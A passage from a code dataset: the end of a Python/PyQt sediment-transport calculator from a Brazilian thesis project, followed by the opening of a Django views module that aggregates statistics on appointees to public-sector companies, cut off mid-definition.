\n if PAM <= 0.5:\n A = 9.8/(PAM**1.515)\n elif PAM <= 0.66:\n A = 41.0*PAM ** 0.55\n elif PAM <= 0.72:\n A = 228.0 * PAM ** 4.68\n elif PAM <= 1.3:\n A = 49.0\n else:\n A = 23.5 * PAM ** 2.8\n\n if F1 <= 0.25:\n pass\n elif F1 <= 0.35:\n A = A*5.2*F1**1.19\n else:\n A = A*0.5/F1**1.05\n\n if A < 16:\n A = 16\n\n CT = 0\n UGS = 0\n \n for i in range(1,len(ib)):\n if i <= 1:\n GFB = 1.905/(T*A/(V**2))**1.667\n if ib[i]>0:\n if i <= 7:\n D=DFT[i]\n FV = FallVelocity(D, TEMP, AF)\n else:\n FV=1.6\n else:\n continue\n else:\n GFA = GFB\n GFB = GFA/3.175\n if ib[i]>0:\n if i <= 7:\n D=DFT[i]\n FV = FallVelocity(D, TEMP, AF)\n else:\n FV=1.6\n else:\n CList.append(0.0)\n UGSList.append(0.0)\n continue\n \n ZOM = FV * V/SI\n if ZOM < (1.5*ZV):\n ZOM = 1.5 * ZV\n F1 = 0.756 * ZOM - ZV\n F2 = ZOM - ZV\n F3 = 1.5 * ZOM - ZV\n F4 = 1.0 - F1\n F5 = 1.0 - F2\n F6 = 1.0 - F3\n YAF4 = YA**F4\n C = ib[i]*W\n DD = 2.0 * DFT[i]\n DDF4 = DD ** F4\n UD = CV * V * (DD/Y) ** ZV\n X = F4 * GFB / (YAF4 - DDF4)\n UGSI = X*DDF4\n UBL = UGSI/(43.2*UD*DD)\n \n if UBL > 100.0:\n UGSI = UGSI*100.0/UBL\n\n UGSI = C * UGSI\n \n if NLD != 2:\n GA = UGSI + C*GFB\n C = C*X\n YAF2 = YA**(F2-F1)\n YAF5 = YA**F5\n CF5 = C/F5\n YBF3 = YB**(F3-F2)\n YBF6 = YB**F6\n CF6 = C/F6\n CF4 = C/ F4\n GB = CF5 * YAF2 * (YB**F5 - YAF5)\n GC = CF6 * YAF2 * YBF3 * (Y**F6 - YBF6)\n UGSI = GA + GB + GC\n\n UGSI = UGSI/(43.2*W)\n UGS = UGS + UGSI\n CI = 16000 * UGSI/(Y*V)\n CT = CT + CI\n\n CList.append(CI)\n UGSList.append(0.0000625*CI*Y*V)\n \n return [CT, UGS, UGS*43.2*W, CList, UGSList]\n\nclass MainApp(QtGui.QMainWindow, design.Ui_MainWindow):\n def __init__(self):\n super(self.__class__, self).__init__()\n self.setupUi(self)\n\n self.CalcularPushButton.clicked.connect(self.RunProgram)\n self.SIntRadioButton.setChecked(True)\n self.SIngRadioButton.clicked.connect(self.ChangeToSIng)\n self.SIntRadioButton.clicked.connect(self.ChangeToSInt)\n self.CalcularDeclivPushButton.clicked.connect(self.CalcularDeclividade)\n self.actionSalvar.triggered.connect(self.Salvar)\n self.actionAbrir.triggered.connect(self.Abrir)\n self.actionSair.triggered.connect(self.Sair)\n self.ArrasteSuspensaoCheckBox.clicked.connect(self.ToogleArrasteSuspensao)\n self.ArrasteCheckBox.clicked.connect(self.ToogleArraste)\n self.actionSobre.triggered.connect(self.Sobre)\n\n def Salvar(self):\n print(\"Salvando...\")\n Local = str(self.LocalLineEdit.text())\n settings = QtCore.QSettings(Local+'.ini', QtCore.QSettings.IniFormat) \n\n for name, obj in inspect.getmembers(self):\n if isinstance(obj, QtGui.QComboBox):\n name = obj.objectName() # get combobox name\n index = obj.currentIndex() # get current index from combobox\n text = obj.itemText(index) # get the text for current index\n settings.setValue(name, text) # save combobox selection to registry\n\n if isinstance(obj, QtGui.QLineEdit):\n name = obj.objectName()\n value = obj.text()\n settings.setValue(name, value) # save ui values, so they can be restored next time\n\n if isinstance(obj, QtGui.QCheckBox):\n name = obj.objectName()\n state = obj.checkState()\n settings.setValue(name, state)\n\n print('Done!')\n \n def Abrir(self):\n print('Abrindo...')\n try:\n ArquivodeDados = QtGui.QFileDialog.getOpenFileName()\n settings = QtCore.QSettings(ArquivodeDados, QtCore.QSettings.IniFormat)\n for name, obj in inspect.getmembers(self):\n if isinstance(obj, QtGui.QComboBox):\n index = obj.currentIndex() # get current region from combobox\n name = obj.objectName()\n value = unicode(settings.value(name).toString()) \n\n if value == \"\":\n continue\n\n index = obj.findText(value) # get the corresponding index for specified string in combobox\n\n if index == -1: # add to list if not found\n obj.insertItems(0,[value])\n index = obj.findText(value)\n obj.setCurrentIndex(index)\n else:\n obj.setCurrentIndex(index) # preselect a combobox value by index \n\n if isinstance(obj, QtGui.QLineEdit):\n name = obj.objectName()\n value = unicode(settings.value(name).toString()) # get stored value from registry\n obj.setText(value) # restore lineEditFile\n\n if isinstance(obj, QtGui.QCheckBox):\n name = obj.objectName()\n value = int(settings.value(name).toString()) # get stored value from registry\n obj.setCheckState(value) # restore checkbox\n except:\n print('Error opening file.')\n \n def Sair(self):\n sys.stderr.write('\\r')\n if QtGui.QMessageBox.question(None, '', \"Are you sure you want to quit?\",\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,\n QtGui.QMessageBox.No) == QtGui.QMessageBox.Yes:\n QtGui.QApplication.quit()\n\n def Sobre(self):\n QtGui.QMessageBox.information(None, 'Copyright', \"SEDIM 2.0 Copyright (C) 2017 ROBERTA CAMPEAO \\n \\nEste software foi desenvolvido na Dissertação apresentada ao Curso de Pós Graduação em Engenharia de Biossistemas da Universidade Federal Fluminense, com apoio financeiro da Fundação CAPES. \\n \\nBaseado em: HORA, Mônica de A. G. M.. Avaliação do Transporte de Sedimentos da Sub-bacia do Ribeirão do Rato, Região Noroeste do Estado do Paraná. Dissertação (Mestrado em Engenharia Civil) - Universidade Federal do Rio de Janeiro, Rio de Janeiro, 1996. 287p. \\n \\nContato: Roberta Campeão - robertacampeao@gmail.com, Mônica da Hora - dahora@vm.uff.br \\n \\nThis program comes with ABSOLUTELY NO WARRANTY. \\nThis is free software, and you are welcome to redistribute it \\nunder certain conditions; For details see readme file.\")\n os.system('Manual.pdf')\n \n def ToogleArrasteSuspensao(self):\n if self.ArrasteSuspensaoCheckBox.isChecked():\n self.LaursenCheckBox.setCheckState(1)\n self.EngelundeHansenCheckBox.setCheckState(1)\n self.ColbyCheckBox.setCheckState(1)\n self.AckersWhiteD50CheckBox.setCheckState(1)\n self.AckersWhiteD35CheckBox.setCheckState(1)\n self.YangSandD50CheckBox.setCheckState(1)\n self.YangSandFTCheckBox.setCheckState(1)\n self.YangGravelD50CheckBox.setCheckState(1)\n self.YangGravelFTCheckBox.setCheckState(1)\n self.YangMixCheckBox.setCheckState(1)\n## self.ToffaletiCheckBox.setCheckState(1)\n if not self.ArrasteSuspensaoCheckBox.isChecked():\n self.LaursenCheckBox.setCheckState(0)\n self.EngelundeHansenCheckBox.setCheckState(0)\n self.ColbyCheckBox.setCheckState(0)\n self.AckersWhiteD50CheckBox.setCheckState(0)\n self.AckersWhiteD35CheckBox.setCheckState(0)\n self.YangSandD50CheckBox.setCheckState(0)\n self.YangSandFTCheckBox.setCheckState(0)\n self.YangGravelD50CheckBox.setCheckState(0)\n self.YangGravelFTCheckBox.setCheckState(0)\n self.YangMixCheckBox.setCheckState(0)\n## self.ToffaletiCheckBox.setCheckState(0)\n\n def ToogleArraste(self):\n if self.ArrasteCheckBox.isChecked():\n self.SchoklitschCheckBox.setCheckState(1)\n self.KallinskeCheckBox.setCheckState(1)\n self.MeyerPeterICheckBox.setCheckState(1)\n self.RottnerCheckBox.setCheckState(1)\n if not self.ArrasteCheckBox.isChecked():\n self.SchoklitschCheckBox.setCheckState(0)\n self.KallinskeCheckBox.setCheckState(0)\n self.MeyerPeterICheckBox.setCheckState(0)\n self.RottnerCheckBox.setCheckState(0)\n\n def ChangeToSIng(self):\n self.LarguraUnidLabel.setText('ft')\n self.ProfUnidLabel.setText('ft')\n self.VelocUnidLabel.setText('ft/s')\n self.DeclivUnidLabel.setText('ft/ft')\n self.TempUnidLabel.setText(u'ºC')\n self.D35UnidLabel.setText('mm')\n self.D50UnidLabel.setText('mm')\n self.D65UnidLabel.setText('mm')\n self.D90UnidLabel.setText('mm')\n self.VazaoUnidLabel.setText('ft3/s')\n self.RaioUnidLabel.setText('ft')\n self.AreaUnidLabel.setText('ft2')\n\n def ChangeToSInt(self):\n self.LarguraUnidLabel.setText('m')\n self.ProfUnidLabel.setText('m')\n self.VelocUnidLabel.setText('m/s')\n self.DeclivUnidLabel.setText('m/m')\n self.TempUnidLabel.setText(u'ºC')\n self.D35UnidLabel.setText('mm')\n self.D50UnidLabel.setText('mm')\n self.D65UnidLabel.setText('mm')\n self.D90UnidLabel.setText('mm')\n self.VazaoUnidLabel.setText('m3/s')\n self.RaioUnidLabel.setText('m')\n self.AreaUnidLabel.setText('m2')\n\n def CalcularDeclividade(self):\n if self.SIntRadioButton.isChecked(): \n q = float(self.VazaoLineEdit.text()) #Vazao linear m3/s\n n = float(self.RugosidadeLineEdit.text()) #coeficiente de rugosidade\n R = float(self.RaioLineEdit.text()) #Raio hidraulico m\n A = float(self.AreaLineEdit.text()) #Area da secao m2\n V = float(self.VelocLineEdit.text()) #m/s velocidade media\n S = (q * n /(A*R**(0.666)))**2 #declividade = gradiente de energia m/m\n self.DeclivLineEdit.setText(str(S))\n \n if self.SIngRadioButton.isChecked():\n q = float(self.VazaoLineEdit.text()) * 0.3048**3.0 #Vazao linear m3/s\n n = float(self.RugosidadeLineEdit.text()) #coeficiente de rugosidade\n R = float(self.RaioLineEdit.text()) * 0.3048 #Raio hidraulico m\n V = float(self.VelocLineEdit.text()) * 0.3048 #m/s velocidade media\n A = float(self.AreaLineEdit.text()) * 0.3048 ** 2.0 #Area da secao m2\n S = (q * n / (A.R**(0.666)))**2 #declividade = gradiente de energia m/m\n self.DeclivLineEdit.setText(str(S))\n\n def RunProgram(self):\n try:\n if self.SIntRadioButton.isChecked():\n g = 32.1725 #ft/s^2 aceleracao da gravidade\n Y = float(self.ProfLineEdit.text()) * 1000.0 / 304.8 #ft profundidade\n V = float(self.VelocLineEdit.text()) * 1000.0 / 304.8 #ft/s velocidade media\n DF35 = float(self.D35LineEdit.text()) / 304.8 #ft\n DF50 = float(self.D50LineEdit.text()) / 304.8 #ft\n DF65 = float(self.D65LineEdit.text()) / 304.8 #ft\n DF90 = float(self.D90LineEdit.text()) / 304.8 #ft\n W = float(self.LarguraLineEdit.text())* 1000.0 / 304.8 #ft Largura do rio\n\n if self.SIngRadioButton.isChecked():\n g = 32.1725 #ft/s^2 aceleracao da gravidade\n Y = float(self.ProfLineEdit.text()) #ft profundidade\n V = float(self.VelocLineEdit.text()) #ft/s velocidade media\n DF35 = float(self.D35LineEdit.text()) / 304.8 #ft\n DF50 = float(self.D50LineEdit.text()) / 304.8 #ft\n DF65 = float(self.D65LineEdit.text()) / 304.8 #ft\n DF90 = float(self.D90LineEdit.text()) / 304.8 #ft\n W = float(self.LarguraLineEdit.text()) #ft Largura do rio\n\n ib = [float(self.Faixa1LineEdit.text())/100, float(self.Faixa2LineEdit.text())/100,\n float(self.Faixa3LineEdit.text())/100, float(self.Faixa4LineEdit.text())/100,\n float(self.Faixa5LineEdit.text())/100, float(self.Faixa6LineEdit.text())/100,\n float(self.Faixa7LineEdit.text())/100, float(self.Faixa8LineEdit.text())/100,\n float(self.Faixa9LineEdit.text())/100, float(self.Faixa10LineEdit.text())/100,\n float(self.Faixa11LineEdit.text())/100] #em porcentagem\n\n Local = str(self.LocalLineEdit.text())\n GMS = 165.36 #lb/ft^3 Peso especifico do sedimento\n SG = 2.65 #densidade relativa do sedimento adm\n TEMP = float(self.TempLineEdit.text()) #Celsius\n S = float(self.DeclivLineEdit.text()) #declividade = gradiente de energia ft/ft\n\n except:\n print(\"Verifique os dados de entrada.\")\n QtGui.QMessageBox.warning(self, 'Erro!', \"Verifique os dados de entrada.\")\n return\n \n if sum(ib)>1:\n QtGui.QMessageBox.warning(self, 'Erro!', \"Soma das faixas maior que 100%\")\n \n U = math.sqrt(g*Y*S)\n \n COMP1 = 1.0334+0.03672*TEMP+0.0002058*TEMP**2\n XNU = 0.00002/COMP1\n\n COMP2 = 6 * XNU\n FV50 = (math.sqrt(36.064*DF50**3+COMP2**2)-COMP2)/DF50\n \n CY = [[0.1000, 0.2000, 0.3000, 0.400, 0.8000, 0.0000, 0.0000],\n [0.6100, 0.4800, 0.3000, 0.300, 0.3000, 0.0000, 0.0000],\n [1.4530, 1.3290, 1.4000, 1.260, 1.0990, 0.0000, 0.0000],\n [0.0100, 5.0000, 10.0000, 15.600, 20.0000, 30.0000, 40.0000],\n [0.1057, 0.0845, 0.0469, 0.000, -0.0277, -0.0654, -0.1155],\n [0.0735, 0.0166, 0.0014, 0.000, -0.0164, -0.0610, -0.0763],\n [0.0118, 0.0202, 0.0135, 0.000, 0.0000, 0.0000, 0.0000]]\n \n CF = [0.64, 1.0, 1.0, 0.88, 0.2]\n\n AF = [[0.00001,\t0.06,\t0.10,\t0.20,\t0.4,\t0.80,\t1.50,\t2.00,\t3.00,\t7.00,\t8.00,\t9.00,\t10.0],\n [0.0010,\t0.24,\t0.60, 1.80,\t4.6,\t9.50,\t16.1,\t19.9,\t25.3,\t39.5,\t41.5,\t43.5,\t45.0],\n [0.0001,\t0.32,\t0.76,\t2.20,\t5.3,\t10.5,\t16.9,\t20.3,\t25.6,\t39.5,\t41.5,\t43.5,\t45.0],\n [0.0001,\t0.40, 0.92,\t2.50,\t5.8,\t11.0,\t17.5,\t20.7,\t25.9,\t39.5,\t41.5,\t43.5,\t45.0],\n [0.0001,\t0.49,\t1.10,\t2.85,\t6.3,\t11.6,\t17.9,\t21.1,\t26.2,\t39.5,\t41.5,\t43.5,\t45.0],\n [0.0001,\t0.57,\t1.26,\t3.20,\t6.7,\t12.0,\t18.1,\t21.5,\t26.5,\t39.5,\t41.5,\t43.5,\t45.0]]\n\n DIP = [0,0.37,0.71,0.99,1.21,1.34,1.41,1.38,1.27,1.11,0.94,0.78,0.65,0.55,0.49,0.45,0.42,0.4]\n \n AK0 = -0.068\n AK1 = -1.1328\n AK2 = 0.94\n AK3 = -1.206\n AK4 = 0.567\n AK5 = -0.0975\n \n DFT = []\n Fgran = [0.016, 0.062, 0.125, 0.25, 0.5, 1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 64.0]\n\n Fgranlabel = ['0.0 - 0.062', '0.062 - 0.125', '0.125 - 0.25',\n '0.25 - 0.5', '0.5 - 1.0', '1.0 - 2.0', '2.0 - 4.0', '4.0 - 8.0',\n '8.0 - 16.0', '16.0 - 32.0', '32.0 - 64.0']\n \n for i in range(len(Fgran)-1):\n DFT.append(math.sqrt(Fgran[i]*Fgran[i+1])/304.8)\n\n Dm = 0\n for D, i in zip(DFT, ib):\n Dm = Dm + D*304.8*i\n\n wbk = xlsxwriter.Workbook(Local+'.xlsx')\n sheetSInt = wbk.add_worksheet(\"Sist Internacional\")\n sheetSIng = wbk.add_worksheet(\"Sist Ingles\")\n \n row = 0\n\n ErrorMessages = []\n \n if self.LaursenCheckBox.isChecked():\n try:\n #print \"Laursen\", Laursen(DFT, ib, V, SG, g, Y, XNU, U, DF50, W)\n ResultLaursen = Laursen(DFT, ib, V, SG, g, Y, XNU, U, DF50, W)\n row = WriteResultsFaixa('Laursen', ResultLaursen, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 1)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.EngelundeHansenCheckBox.isChecked():\n try:\n #print \"EngelundeHansen\", EngelundeHansen(GMS, V, S, DF50, g, SG, W, Y)\n ResultEngelundeHansen = EngelundeHansen(GMS, V, S, DF50, g, SG, W, Y)\n row = WriteResultsFaixa('EngelundeHansen', ResultEngelundeHansen, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 0)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.ColbyCheckBox.isChecked():\n try:\n #print \"Colby\", Colby(DF50, Y, V, CY, CF, W, TEMP)\n ResultColby = Colby(DF50, Y, V, CY, CF, W, TEMP)\n row = WriteResultsFaixa('Colby', ResultColby, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 0)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.AckersWhiteD35CheckBox.isChecked():\n try:\n #print \"AckersWhiteD35\", AckersWhite(DF35, g, SG, XNU, U, V, Y, W)\n ResultAckersWhite = AckersWhite(DF35, g, SG, XNU, U, V, Y, W)\n row = WriteResultsFaixa('AckersWhiteD35', ResultAckersWhite, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 0)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.AckersWhiteD50CheckBox.isChecked():\n try:\n #print \"AckersWhiteD50\", AckersWhite(DF50, g, SG, XNU, U, V, Y, W)\n ResultAckersWhite = AckersWhite(DF50, g, SG, XNU, U, V, Y, W)\n row = WriteResultsFaixa('AckersWhiteD50', ResultAckersWhite, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 0)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.YangSandD50CheckBox.isChecked():\n try:\n #print \"YangSandD50\", YangD50('Sand', FV50, DF50, TEMP, AF, D, U, XNU, V, S, Y, W)\n ResultYangSandD50 = YangD50('Sand', FV50, DF50, TEMP, AF, D, U, XNU, V, S, Y, W)\n row = WriteResultsFaixa('YangSandD50', ResultYangSandD50, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 0)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.YangSandFTCheckBox.isChecked():\n try:\n #print \"YangSandFT\", YangFT('Sand', ib, DFT, TEMP, AF, XNU, U, V, S, Y, W)\n ResultYangSandFT = YangFT('Sand', ib, DFT, TEMP, AF, XNU, U, V, S, Y, W)\n row = WriteResultsFaixa('YangSandFT', ResultYangSandFT, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 1)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.YangGravelD50CheckBox.isChecked():\n try:\n #print \"YangGravelD50\", YangD50('Gravel', FV50, DF50, TEMP, AF, D, U, XNU, V, S, Y, W)\n ResultYangGravelD50 = YangD50('Gravel', FV50, DF50, TEMP, AF, D, U, XNU, V, S, Y, W)\n row = WriteResultsFaixa('YangGravelD50', ResultYangGravelD50, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 0)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.YangGravelFTCheckBox.isChecked():\n try:\n #print \"YangGravelFT\", YangFT('Gravel', ib, DFT, TEMP, AF, XNU, U, V, S, Y, W)\n ResultYangGravelSF = YangFT('Gravel', ib, DFT, TEMP, AF, XNU, U, V, S, Y, W)\n row = WriteResultsFaixa('YangGravelFT', ResultYangGravelSF, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 1)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.YangMixCheckBox.isChecked():\n try:\n #print \"YangMixFT\", YangFT('Mixture', ib, DFT, TEMP, AF, XNU, U, V, S, Y, W)\n ResultYangMixFT = YangFT('Mixture', ib, DFT, TEMP, AF, XNU, U, V, S, Y, W)\n row = WriteResultsFaixa('YangMixFT', ResultYangMixFT, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 1)\n except Exception as e:\n ErrorMessages.append(e)\n\n## if self.ToffaletiCheckBox.isChecked():\n## NLD = 1.0\n## try:\n## print \"Toffaleti\", Toffaleti(TEMP, Y, S, V, DF65, g, XNU, DFT, DIP, ib, AF, NLD, W)\n## ResultToffaleti = Toffaleti(TEMP, Y, S, V, DF65, g, XNU, DFT, DIP, ib, AF, NLD, W)\n## row = WriteResultsFaixa('Toffaleti', ResultToffaleti, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 1)\n## except Exception as e:\n## ErrorMessages.append(e)\n\n if self.SchoklitschCheckBox.isChecked():\n try:\n #print \"Schoklitsch\", Schoklitsch(DFT, ib, S, Y, V, W)\n ResultSchoklitsch = Schoklitsch(DFT, ib, S, Y, V, W)\n row = WriteResultsFaixa('Schoklitsch', ResultSchoklitsch, ib, Fgranlabel, row, sheetSInt, sheetSIng, 1)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.KallinskeCheckBox.isChecked():\n try:\n #print \"Kalinske\", Kalinske(DFT, ib, AK0, AK1, AK2, AK3, AK4, AK5, Y, V, S, W)\n ResultKalinske = Kalinske(DFT, ib, AK0, AK1, AK2, AK3, AK4, AK5, Y, V, S, W)\n row = WriteResultsFaixa('Kalinske', ResultKalinske, ib, Fgranlabel, row, sheetSInt, sheetSIng, 1)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.MeyerPeterICheckBox.isChecked():\n try:\n #print \"MeyerPetereMuller\", MeyerPetereMuller(DF90, Dm, Y, V, S, W)\n ResultMeyerPetereMuller = MeyerPetereMuller(DF90, Dm, Y, V, S, W)\n row = WriteResultsFaixa('MeyerPetereMuller', ResultMeyerPetereMuller, ib, Fgranlabel, row, sheetSInt, sheetSIng, 0)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.RottnerCheckBox.isChecked():\n try:\n #print \"Rottner\", Rottner(GMS, SG, g, Y, V, DF50, W)\n ResultRottner = Rottner(GMS, SG, g, Y, V, DF50, W)\n row = WriteResultsFaixa('Rottner', ResultRottner, ib, Fgranlabel, row, sheetSInt, sheetSIng, 0)\n except Exception as e:\n ErrorMessages.append(e)\n\n if row == 0:\n QtGui.QMessageBox.warning(self, 'Erro!', \"Selecione um metodo.\")\n wbk.close()\n return\n\n wbk.close()\n\n if ErrorMessages != []:\n errorhand = open('Erros.txt', 'w')\n print('Error messages:')\n for e in ErrorMessages:\n print(e)\n print >>errorhand, e\n QtGui.QMessageBox.information(self, 'Aviso:', \"Checar mensagens de erro!\")\n else:\n QtGui.QMessageBox.information(self, 'Sucesso!', \"Resultados exportados!\")\n\ndef main():\n app = QtGui.QApplication(sys.argv) # A new instance of QApplication\n form = MainApp() # We set the form to be our MainApp\n form.show() # Show the form\n app.exec_() # and execute the app\n\nif __name__ == '__main__':\n main()\n","repo_name":"Robcampeao/Sedim2","sub_path":"Sedim2.py","file_name":"Sedim2.py","file_ext":"py","file_size_in_byte":35046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29048363713","text":"from django.db.models.aggregates import Count, Sum\nfrom django.db.models.query_utils import Q\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom django.shortcuts import render_to_response, redirect\nfrom django.core.serializers import serialize\nfrom django.conf import settings\nfrom django.views.generic import TemplateView, View\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\nfrom django.db.models.query import QuerySet\nfrom django.utils.functional import curry\nfrom django.template.defaultfilters import slugify\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\n\nfrom nominati.models import Incarico, Ente, Persona, TipoCarica, Regione, Partecipata, Bilancio, Partecipazione\nimport json\nfrom json.encoder import JSONEncoder\nimport urllib2\nfrom datetime import datetime, timedelta\n\nclass AccessControlView(object):\n \"\"\"\n Define access control for the view\n \"\"\"\n @method_decorator(login_required)\n def dispatch(self, *args, **kwargs):\n return super(AccessControlView, self).dispatch(*args, **kwargs)\n\n\nclass DjangoJSONEncoder(JSONEncoder):\n def default(self, obj):\n if isinstance(obj, QuerySet):\n # `default` must return a python serializable\n # structure, the easiest way is to load the JSON\n # string produced by `serialize` and return it\n\n return json.dumps([t for t in obj])\n # return json.loads(serialize('json', obj, ))\n\n return JSONEncoder.default(self,obj)\n # return json.dumps([unicode(t) for t in obj])\n\n\ndumps = curry(json.dumps, cls=DjangoJSONEncoder)\n\nclass JSONResponseMixin(object):\n def render_to_response(self, context):\n \"Returns a JSON response containing 'context' as payload\"\n return self.get_json_response(self.convert_context_to_json(context))\n\n def get_json_response(self, content, **httpresponse_kwargs):\n \"Construct an `HttpResponse` object.\"\n return HttpResponse(content,\n content_type='application/json',\n **httpresponse_kwargs)\n\n def convert_context_to_json(self, context):\n \"Convert the context dictionary into a JSON object\"\n # Note: This is *EXTREMELY* naive; in reality, you'll need\n # to do much more complex handling to ensure that arbitrary\n # objects -- such as Django model instances or querysets\n # -- can be serialized as JSON.\n return dumps(context)\n\n\nclass RegioneListView(AccessControlView, ListView):\n model = Regione\n\n\nclass PartecipateView(AccessControlView):\n model = None\n incarichi = []\n partecipate = []\n context_object_name=''\n base_template=''\n context = {}\n\n\n def get_context_data(self, **kwargs ):\n context = super(PartecipateView, self).get_context_data(**kwargs)\n\n tipologia = self.request.GET.get('tipo',)\n\n context['SITE_URL'] = settings.SITE_URL\n context['OP_URL'] = settings.OP_URL\n\n now = datetime.now()\n context['table'] = []\n context['base_template'] = self.base_template\n self.template_name = self.base_template\n partecipate = self.partecipate\n incarichi = self.incarichi\n context['base_template']= self.base_template\n\n if tipologia != '':\n\n if tipologia =='part_tipologia':\n context['table'] = partecipate.\\\n annotate(n_inc=Count('incarico')).\\\n annotate(s_inc=Sum('incarico__compenso_totale')).\\\n order_by('tipologia_partecipata')\n self.template_name = \"nominati/part_tipologia.html\"\n\n if tipologia == 'part_competenze':\n context['table'] = partecipate.order_by('-competenza_partecipata')\n self.template_name = \"nominati/part_competenze.html\"\n\n if tipologia == 'part_finalita':\n context['table'] = partecipate.order_by('-finalita_partecipata')\n self.template_name = \"nominati/part_finalita.html\"\n\n if tipologia == 'part_resoconto':\n partecipate_ids = partecipate.values_list('codice_fiscale')\n bilancio_part={}\n for b in Bilancio.objects.filter(partecipata_cf__codice_fiscale__in=partecipate_ids):\n if b.partecipata_cf not in bilancio_part:\n bilancio_part[b.partecipata_cf] = b\n elif b.resoconto is not None and b.anno > bilancio_part[b.partecipata_cf].anno:\n bilancio_part[b.partecipata_cf] = b\n\n context['table']=sorted(bilancio_part.values(),key=lambda bilancio: bilancio.resoconto)\n self.template_name = \"nominati/part_resoconto.html\"\n\n if tipologia == 'amm_tot':\n\n context['n_amministratori_uomini'] = incarichi.filter(persona__sesso=1).values('persona').distinct().count()\n context['n_amministratori_donne'] = incarichi.filter(persona__sesso=0).values('persona').distinct().count()\n context['n_amministratori'] =context['n_amministratori_donne']+context['n_amministratori_uomini']\n\n # age levels and filters\n ages = [\n {\n 'age':'under 25',\n 'filters': {\n 'persona__data_nascita__gt': now-timedelta(days=9131.05),\n }\n },\n {\n 'age':'tra 25 e 35',\n 'filters': {\n 'persona__data_nascita__gt': now-timedelta(days=12783.5),\n 'persona__data_nascita__lte': now-timedelta(days=9131.05),\n }\n },\n {\n 'age':'tra 35 e 45',\n 'filters': {\n 'persona__data_nascita__gt': now-timedelta(days=16435.9),\n 'persona__data_nascita__lte': now-timedelta(days=12783.5),\n }\n },\n {\n 'age':'tra 45 e 55',\n 'filters': {\n 'persona__data_nascita__gt': now-timedelta(days=20088.3),\n 'persona__data_nascita__lte': now-timedelta(days=16435.9),\n }\n },\n {\n 'age':'tra 55 e 65',\n 'filters': {\n 'persona__data_nascita__gt': now-timedelta(days=23740.7),\n 'persona__data_nascita__lte': now-timedelta(days=20088.3),\n }\n },\n {\n 'age':'over 65',\n 'filters': {\n 'persona__data_nascita__lte': now-timedelta(days=23740.7),\n }\n },\n {\n 'age':'unknown',\n 'filters': {\n 'persona__data_nascita__isnull': True,\n }\n },\n ]\n\n\n for item in ages:\n context['table'].append({\n 'age': item['age'],\n 'all': incarichi.filter(**item['filters']).values('persona').distinct().count(),\n 'male': incarichi.\\\n filter(**item['filters']).filter(persona__sesso=Persona.MALE_SEX).\\\n values('persona').distinct().count(),\n 'female': incarichi.\\\n filter(**item['filters']).filter(persona__sesso=Persona.FEMALE_SEX).\\\n values('persona').distinct().count(),\n })\n context['n_amministratori_tipo_carica'] = []\n for c in TipoCarica.objects.all():\n context['n_amministratori_tipo_carica'].append(\n {\n 'denominazione': c.denominazione,\n 'tot': incarichi.filter(tipo_carica=c).values('persona').distinct().count(),\n 'uomini': incarichi.filter(tipo_carica=c).\\\n filter(persona__sesso=Persona.MALE_SEX).\\\n values('persona').distinct().count(),\n 'donne': incarichi.filter(tipo_carica=c).\\\n filter(persona__sesso=Persona.FEMALE_SEX).\\\n values('persona').distinct().count()\n }\n )\n\n self.template_name = 'nominati/amm_tot.html'\n\n if tipologia == 'amm_politici':\n\n context['table'] = incarichi.\\\n filter(persona__openpolis_id__isnull=False).\\\n exclude(persona__openpolis_id='').\\\n order_by('persona__cognome').distinct()\n\n self.template_name = 'nominati/amm_politici.html'\n\n if tipologia == 'amm_incarichi':\n\n context['table'] = incarichi.\\\n values('persona', 'persona__nome', 'persona__cognome').\\\n annotate(n=Count('persona')).order_by('-n')\n\n self.template_name = 'nominati/amm_incarichi.html'\n\n if tipologia == 'amm_compenso':\n\n context['table'] = incarichi.\\\n values('persona', 'persona__nome', 'persona__cognome').\\\n annotate(s=Sum('compenso_totale')).order_by('-s')\n\n self.template_name = 'nominati/amm_compenso.html'\n\n if tipologia == 'lista_nominati':\n\n lista_nominati = incarichi.\\\n select_related('persona', 'tipo_carica', 'partecipata_cf', 'ente_nominante_cf').\\\n annotate(nInc = Count('persona__incarico')).\\\n order_by('persona__cognome')\n\n context['table']=lista_nominati\n self.template_name = 'nominati/lista_nominati.html'\n\n return context\n\n\n\n\n\nclass RegioneDetailView(PartecipateView, DetailView):\n model = Regione\n context_object_name = \"regione\"\n base_template='nominati/regione_detail.html'\n\n\n def get_context_data(self, **kwargs ):\n r = self.get_object()\n now = datetime.now()\n self.partecipate = Partecipata.objects.all().filter(ente__regione = r).select_related().distinct()\n self.incarichi = Incarico.objects.filter(ente_nominante_cf__regione = r).\\\n filter(Q(data_inizio__lte=now) &\n (Q(data_fine__gte=now) | Q(data_fine__isnull=True)))\n self.context = super(RegioneDetailView, self).get_context_data(**kwargs)\n\n return self.context\n\n\nclass NazioneView(PartecipateView, TemplateView):\n\n template_name='nominati/nazione_detail.html'\n\n\n def 